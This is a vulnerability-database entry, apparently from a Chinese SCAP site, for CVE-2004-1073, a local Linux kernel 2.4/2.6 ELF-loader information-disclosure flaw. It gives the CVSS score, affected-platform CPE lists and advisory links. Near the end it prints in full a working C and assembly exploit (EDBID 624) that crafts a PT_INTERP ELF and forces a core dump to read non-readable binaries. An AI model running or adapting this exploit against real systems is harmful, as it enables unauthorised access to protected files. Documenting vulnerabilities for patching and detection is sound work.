CVE-2004-1073
CVSS 2.1
Published: 2005-01-10 00:00:00
Revised: 2013-07-18 00:33:23

[Original text] The open_exec function in the execve functionality (exec.c) in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, allows local users to read non-readable ELF binaries by using the interpreter (PT_INTERP) functionality.


[CNNVD] Linux Kernel execve() Information Disclosure Vulnerability (CNNVD-200501-062)

Linux Kernel is the kernel used by the open-source operating system Linux.
The open_exec function in exec.c of Linux kernel 2.4.x through 2.4.27 and 2.6.x through 2.6.8 contains a vulnerability.
A local user can use PT_INTERP to read ELF binaries that are not readable to them.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: PARTIAL [information disclosure is likely]
Integrity impact: NONE [no impact on system integrity]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation is not subject to access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:trustix:secure_linux:1.5 (Trustix Secure Linux 1.5)
cpe:/o:linux:linux_kernel:2.6.0:test2 (Linux Kernel 2.6 test2)
cpe:/o:linux:linux_kernel:2.6.1 (Linux Kernel 2.6.1)
cpe:/o:redhat:enterprise_linux:2.1::workstation_ia64
cpe:/o:redhat:enterprise_linux:2.1::advanced_server
cpe:/o:linux:linux_kernel:2.4.27 (Linux Kernel 2.4.27)
cpe:/o:redhat:enterprise_linux:3.0::workstation_server
cpe:/o:linux:linux_kernel:2.4.24_ow1
cpe:/o:linux:linux_kernel:2.4.23:pre9 (Linux Kernel 2.4.23 pre9)
cpe:/o:linux:linux_kernel:2.4.0:test3 (Linux Kernel 2.4.0 test3)
cpe:/o:linux:linux_kernel:2.6.0:test1 (Linux Kernel 2.6 test1)
cpe:/o:linux:linux_kernel:2.6.0:test11 (Linux Kernel 2.6 test11)
cpe:/o:linux:linux_kernel:2.6.9:2.6.20
cpe:/o:redhat:enterprise_linux:2.1::advanced_server_ia64
cpe:/o:suse:suse_linux:8::enterprise_server
cpe:/o:linux:linux_kernel:2.6.0:test6 (Linux Kernel 2.6 test6)
cpe:/o:trustix:secure_linux:2.0 (Trustix Secure Linux 2.0)
cpe:/o:trustix:secure_linux:2.1 (Trustix Secure Linux 2.1)
cpe:/o:linux:linux_kernel:2.4.12 (Linux Kernel 2.4.12)
cpe:/o:linux:linux_kernel:2.4.0:test8 (Linux Kernel 2.4.0 test8)
cpe:/o:suse:suse_linux:8.2 (SuSE SuSE Linux 8.2)
cpe:/o:linux:linux_kernel:2.4.19:pre3 (Linux Kernel 2.4.19 pre3)
cpe:/o:linux:linux_kernel:2.4.23_ow2
cpe:/o:linux:linux_kernel:2.4.3 (Linux Kernel 2.4.3)
cpe:/o:trustix:secure_linux:2.2 (Trustix Secure Linux 2.2)
cpe:/o:linux:linux_kernel:2.4.23 (Linux Kernel 2.4.23)
cpe:/o:linux:linux_kernel:2.4.0:test10 (Linux Kernel 2.4.0 test10)
cpe:/o:redhat:enterprise_linux:3.0::advanced_server
cpe:/o:suse:suse_linux:9.0::enterprise_server
cpe:/o:suse:suse_linux:8.1 (SuSE SuSE Linux 8.1)
cpe:/o:linux:linux_kernel:2.4.0:test1 (Linux Kernel 2.4.0 test1)
cpe:/o:suse:suse_linux:9.2 (SuSE SuSE Linux 9.2)
cpe:/o:linux:linux_kernel:2.4.27:pre2 (Linux Kernel 2.4.27 pre2)
cpe:/o:redhat:fedora_core:core_3.0
cpe:/o:linux:linux_kernel:2.6.8:rc3 (Linux Kernel 2.6.8 Release Candidate 3)
cpe:/o:linux:linux_kernel:2.4.4 (Linux Kernel 2.4.4)
cpe:/o:linux:linux_kernel:2.4.13 (Linux Kernel 2.4.13)
cpe:/o:linux:linux_kernel:2.4.0:test12 (Linux Kernel 2.4.0 test12)
cpe:/o:linux:linux_kernel:2.4.0:test2 (Linux Kernel 2.4.0 test2)
cpe:/o:linux:linux_kernel:2.4.18:pre1 (Linux Kernel 2.4.18 pre1)
cpe:/o:linux:linux_kernel:2.4.20 (Linux Kernel 2.4.20)
cpe:/o:linux:linux_kernel:2.4.19:pre4 (Linux Kernel 2.4.19 pre4)
cpe:/o:linux:linux_kernel:2.4.0:test4 (Linux Kernel 2.4.0 test4)
cpe:/o:linux:linux_kernel:2.4.27:pre4 (Linux Kernel 2.4.27 pre4)
cpe:/o:linux:linux_kernel:2.6.1:rc1 (Linux Kernel 2.6.1 Release Candidate 1)
cpe:/o:linux:linux_kernel:2.4.27:pre5 (Linux Kernel 2.4.27 pre5)
cpe:/o:linux:linux_kernel:2.6.1:rc2 (Linux Kernel 2.6.1 Release Candidate 2)
cpe:/o:redhat:enterprise_linux:2.1::workstation
cpe:/o:linux:linux_kernel:2.4.21:pre7 (Linux Kernel 2.4.21 pre7)
cpe:/o:linux:linux_kernel:2.6.0:test4 (Linux Kernel 2.6 test4)
cpe:/o:linux:linux_kernel:2.6.0 (Linux Kernel 2.6.0)
cpe:/o:linux:linux_kernel:2.4.22 (Linux Kernel 2.4.22)
cpe:/o:linux:linux_kernel:2.6.6:rc1 (Linux Kernel 2.6.6 Release Candidate 1)
cpe:/o:linux:linux_kernel:2.6.3 (Linux Kernel 2.6.3)
cpe:/o:linux:linux_kernel:2.6.0:test8 (Linux Kernel 2.6 test8)
cpe:/o:redhat:enterprise_linux_desktop:3.0 (Red Hat Desktop 3.0)
cpe:/o:linux:linux_kernel:2.4.19:pre5 (Linux Kernel 2.4.19 pre5)
cpe:/o:redhat:fedora_core:core_2.0
cpe:/o:linux:linux_kernel:2.4.21 (Linux Kernel 2.4.21)
cpe:/o:linux:linux_kernel:2.6.0:test10 (Linux Kernel 2.6 test10)
cpe:/o:linux:linux_kernel:2.4.0:test6 (Linux Kernel 2.4.0 test6)
cpe:/o:linux:linux_kernel:2.4.25 (Linux Kernel 2.4.25)
cpe:/o:linux:linux_kernel:2.4.1 (Linux Kernel 2.4.1)
cpe:/o:linux:linux_kernel:2.6.7:rc1 (Linux Kernel 2.6.7 Release Candidate 1)
cpe:/o:linux:linux_kernel:2.4.17 (Linux Kernel 2.4.17)
cpe:/o:linux:linux_kernel:2.4.14 (Linux Kernel 2.4.14)
cpe:/o:turbolinux:turbolinux_server:10.0
cpe:/o:linux:linux_kernel:2.6.0:test9 (Linux Kernel 2.6 test9)
cpe:/o:redhat:linux_advanced_workstation:2.1::itanium_processor
cpe:/o:linux:linux_kernel:2.4.10 (Linux Kernel 2.4.10)
cpe:/o:linux:linux_kernel:2.4.18:pre5 (Linux Kernel 2.4.18 pre5)
cpe:/o:linux:linux_kernel:2.6.0:test5 (Linux Kernel 2.6 test5)
cpe:/o:redhat:enterprise_linux:3.0::enterprise_server
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server
cpe:/o:linux:linux_kernel:2.4.19:pre6 (Linux Kernel 2.4.19 pre6)
cpe:/o:linux:linux_kernel:2.4.0:test7 (Linux Kernel 2.4.0 test7)
cpe:/o:suse:suse_linux:1.0::desktop
cpe:/o:linux:linux_kernel:2.4.21:pre1 (Linux Kernel 2.4.21 pre1)
cpe:/o:linux:linux_kernel:2.4.27:pre3 (Linux Kernel 2.4.27 pre3)
cpe:/o:redhat:linux_advanced_workstation:2.1::ia64
cpe:/o:linux:linux_kernel:2.4.18:pre3 (Linux Kernel 2.4.18 pre3)
cpe:/o:linux:linux_kernel:2.6.0:test7 (Linux Kernel 2.6 test7)
cpe:/o:linux:linux_kernel:2.4.5 (Linux Kernel 2.4.5)
cpe:/o:linux:linux_kernel:2.4.19:pre2 (Linux Kernel 2.4.19 pre2)
cpe:/o:linux:linux_kernel:2.4.18::x86
cpe:/o:redhat:enterprise_linux:2.1::enterprise_server_ia64
cpe:/o:suse:suse_linux:9.0 (SuSE SuSE Linux 9.0)
cpe:/o:linux:linux_kernel:2.6.5 (Linux Kernel 2.6.5)
cpe:/o:linux:linux_kernel:2.6.7 (Linux Kernel 2.6.7)
cpe:/o:linux:linux_kernel:2.4.18:pre7 (Linux Kernel 2.4.18 pre7)
cpe:/o:linux:linux_kernel:2.4.0:test9 (Linux Kernel 2.4.0 test9)
cpe:/o:linux:linux_kernel:2.4.2 (Linux Kernel 2.4.2)
cpe:/o:linux:linux_kernel:2.4.0:test11 (Linux Kernel 2.4.0 test11)
cpe:/o:linux:linux_kernel:2.6_test9_cvs
cpe:/o:linux:linux_kernel:2.4.16 (Linux Kernel 2.4.16)
cpe:/o:linux:linux_kernel:2.4.27:pre1 (Linux Kernel 2.4.27 pre1)
cpe:/o:linux:linux_kernel:2.4.6 (Linux Kernel 2.4.6)
cpe:/o:linux:linux_kernel:2.4.24 (Linux Kernel 2.4.24)
cpe:/o:linux:linux_kernel:2.4.7 (Linux Kernel 2.4.7)
cpe:/o:linux:linux_kernel:2.6.4 (Linux Kernel 2.6.4)
cpe:/o:linux:linux_kernel:2.4.18:pre4 (Linux Kernel 2.4.18 pre4)
cpe:/o:linux:linux_kernel:2.4.11 (Linux Kernel 2.4.11)
cpe:/o:linux:linux_kernel:2.6.8:rc2 (Linux Kernel 2.6.8 Release Candidate 2)
cpe:/o:linux:linux_kernel:2.4.18:pre8 (Linux Kernel 2.4.18 pre8)
cpe:/o:suse:suse_linux:9.1 (SuSE SuSE Linux 9.1)
cpe:/o:linux:linux_kernel:2.4.19 (Linux Kernel 2.4.19)
cpe:/o:linux:linux_kernel:2.4.18:pre6 (Linux Kernel 2.4.18 pre6)
cpe:/o:linux:linux_kernel:2.4.21:pre4 (Linux Kernel 2.4.21 pre4)
cpe:/o:linux:linux_kernel:2.4.9 (Linux Kernel 2.4.9)
cpe:/o:linux:linux_kernel:2.4.18 (Linux Kernel 2.4.18)
cpe:/o:linux:linux_kernel:2.4.8 (Linux Kernel 2.4.8)
cpe:/o:linux:linux_kernel:2.4.0:test5 (Linux Kernel 2.4.0 test5)
cpe:/o:linux:linux_kernel:2.6.2 (Linux Kernel 2.6.2)
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/o:linux:linux_kernel:2.6.8:rc1 (Linux Kernel 2.6.8 Release Candidate 1)
cpe:/o:linux:linux_kernel:2.4.19:pre1 (Linux Kernel 2.4.19 pre1)
cpe:/o:linux:linux_kernel:2.4.18:pre2 (Linux Kernel 2.4.18 pre2)
cpe:/o:linux:linux_kernel:2.4.26 (Linux Kernel 2.4.26)
cpe:/o:linux:linux_kernel:2.6.0:test3 (Linux Kernel 2.6 test3)
cpe:/o:linux:linux_kernel:2.6.8 (Linux Kernel 2.6.8)
cpe:/o:linux:linux_kernel:2.6.6 (Linux Kernel 2.6.6)
cpe:/o:linux:linux_kernel:2.4.0 (Linux Kernel 2.4.0)
cpe:/o:linux:linux_kernel:2.4.15 (Linux Kernel 2.4.15)

- OVAL (technical details for detection)

oval:org.mitre.oval:def:11503 (The open_exec function in the execve functionality (exec.c) in Linux kernel 2.4.x up to 2.4.27, and 2.6.x up to 2.6.8, allows local users to...)
*OVAL describes in detail how to detect this vulnerability; further technical details on detecting it can be found in the related OVAL definition.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1073
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1073
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-062
(Official data source) CNNVD

- Other links and resources

http://www.redhat.com/support/errata/RHSA-2004-549.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2004:549
https://bugzilla.fedora.us/show_bug.cgi?id=2336
(UNKNOWN)  FEDORA  FLSA:2336
http://xforce.iss.net/xforce/xfdb/18025
(VENDOR_ADVISORY)  XF  linux-elf-setuid-gain-privileges(18025)
http://www.isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
(UNKNOWN)  MISC  http://www.isec.pl/vulnerabilities/isec-0017-binfmt_elf.txt
http://www.securityfocus.com/bid/11646
(UNKNOWN)  BID  11646
http://www.redhat.com/support/errata/RHSA-2006-0191.html
(UNKNOWN)  REDHAT  RHSA-2006:0191
http://www.redhat.com/support/errata/RHSA-2006-0190.html
(UNKNOWN)  REDHAT  RHSA-2006:0190
http://www.redhat.com/support/errata/RHSA-2005-293.html
(UNKNOWN)  REDHAT  RHSA-2005:293
http://www.redhat.com/support/errata/RHSA-2004-505.html
(UNKNOWN)  REDHAT  RHSA-2004:505
http://www.redhat.com/support/errata/RHSA-2004-504.html
(UNKNOWN)  REDHAT  RHSA-2004:504
http://www.mandriva.com/security/advisories?name=MDKSA-2005:022
(UNKNOWN)  MANDRAKE  MDKSA-2005:022
http://www.debian.org/security/2006/dsa-1082
(UNKNOWN)  DEBIAN  DSA-1082
http://www.debian.org/security/2006/dsa-1070
(UNKNOWN)  DEBIAN  DSA-1070
http://www.debian.org/security/2006/dsa-1069
(UNKNOWN)  DEBIAN  DSA-1069
http://www.debian.org/security/2006/dsa-1067
(UNKNOWN)  DEBIAN  DSA-1067
http://secunia.com/advisories/20338
(UNKNOWN)  SECUNIA  20338
http://secunia.com/advisories/20202
(UNKNOWN)  SECUNIA  20202
http://secunia.com/advisories/20163
(UNKNOWN)  SECUNIA  20163
http://secunia.com/advisories/20162
(UNKNOWN)  SECUNIA  20162
http://secunia.com/advisories/18684
(UNKNOWN)  SECUNIA  18684

- Vulnerability information

Linux Kernel execve() Information Disclosure Vulnerability
Low severity  Design error
2005-01-10 00:00:00 2005-10-20 00:00:00
Local

- Advisories and patches

The vendor has released an upgrade patch to fix this security issue; it can be obtained from:
http://www.kernel.org/

- Vulnerability information (624)

Linux Kernel (<= 2.4.27 , 2.6.8) binfmt_elf Executable File Read Exploit (EDBID:624)
linux local
2004-11-10 Verified
0 Paul Starzetz
N/A
/*
 *
 * binfmt_elf executable file read vulnerability
 *
 * gcc -O3 -fomit-frame-pointer elfdump.c -o elfdump
 *
 * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>

#include <linux/elf.h>

#define BADNAME "/tmp/_elf_dump"

void usage(char *s)
{
        printf("\nUsage: %s executable\n\n", s);
        exit(0);
}

// ugly mem scan code :-)
static volatile void bad_code(void)
{
__asm__(
// "1: jmp 1b \n"
                " xorl %edi, %edi \n"
                " movl %esp, %esi \n"
                " xorl %edx, %edx \n"
                " xorl %ebp, %ebp \n"
                " call get_addr \n"

                " movl %esi, %esp \n"
                " movl %edi, %ebp \n"
                " jmp inst_sig \n"

                "get_addr: popl %ecx \n"

// sighand
                "inst_sig: xorl %eax, %eax \n"
                " movl $11, %ebx \n"
                " movb $48, %al \n"
                " int $0x80 \n"

                "ld_page: movl %ebp, %eax \n"
                " subl %edx, %eax \n"
                " cmpl $0x1000, %eax \n"
                " jle ld_page2 \n"

// mprotect
                " pusha \n"
                " movl %edx, %ebx \n"
                " addl $0x1000, %ebx \n"
                " movl %eax, %ecx \n"
                " xorl %eax, %eax \n"
                " movb $125, %al \n"
                " movl $7, %edx \n"
                " int $0x80 \n"
                " popa \n"

                "ld_page2: addl $0x1000, %edi \n"
                " cmpl $0xc0000000, %edi \n"
                " je dump \n"
                " movl %ebp, %edx \n"
                " movl (%edi), %eax \n"
                " jmp ld_page \n"

                "dump: xorl %eax, %eax \n"
                " xorl %ecx, %ecx \n"
                " movl $11, %ebx \n"
                " movb $48, %al \n"
                " int $0x80 \n"
                " movl $0xdeadbeef, %eax \n"
                " jmp *(%eax) \n"

        );
}

static volatile void bad_code_end(void)
{
}

int main(int ac, char **av)
{
struct elfhdr eh;
struct elf_phdr eph;
struct rlimit rl;
int fd, nl, pid;

        if(ac<2)
                usage(av[0]);

// make bad a.out
        fd=open(BADNAME, O_RDWR|O_CREAT|O_TRUNC, 0755);
        nl = strlen(av[1])+1;
        memset(&eh, 0, sizeof(eh) );

// elf exec header
        memcpy(eh.e_ident, ELFMAG, SELFMAG);
        eh.e_type = ET_EXEC;
        eh.e_machine = EM_386;
        eh.e_phentsize = sizeof(struct elf_phdr);
        eh.e_phnum = 2;
        eh.e_phoff = sizeof(eh);
        write(fd, &eh, sizeof(eh) );

// section header(s)
        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_INTERP;
        eph.p_offset = sizeof(eh) + 2*sizeof(eph);
        eph.p_filesz = nl;
        write(fd, &eph, sizeof(eph) );

        memset(&eph, 0, sizeof(eph) );
        eph.p_type = PT_LOAD;
        eph.p_offset = 4096;
        eph.p_filesz = 4096;
        eph.p_vaddr = 0x0000;
        eph.p_flags = PF_R|PF_X;
        write(fd, &eph, sizeof(eph) );

// .interp
        write(fd, av[1], nl );

// execable code
        nl = &bad_code_end - &bad_code;
        lseek(fd, 4096, SEEK_SET);
        write(fd, &bad_code, 4096);
        close(fd);

// dump the shit
        rl.rlim_cur = RLIM_INFINITY;
        rl.rlim_max = RLIM_INFINITY;
        if( setrlimit(RLIMIT_CORE, &rl) )
                perror("\nsetrlimit failed");
        fflush(stdout);
        pid = fork();
        if(pid)
                wait(NULL);
        else
                execl(BADNAME, BADNAME, NULL);

        printf("\ncore dumped!\n\n");
        unlink(BADNAME);

return 0;
} 

// milw0rm.com [2004-11-10]

- Vulnerability information

11600
Linux Kernel ELF Binary Loader open_exec() Binary Read Permission Error
Exploit Public

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-11-10 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

About the SCAP Chinese Community

The SCAP Chinese Community is the first Chinese-language open community in China devoted to SCAP. For more information, see [About this site]

Copyright notice

CVE/CWE/OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on the relevant MITRE websites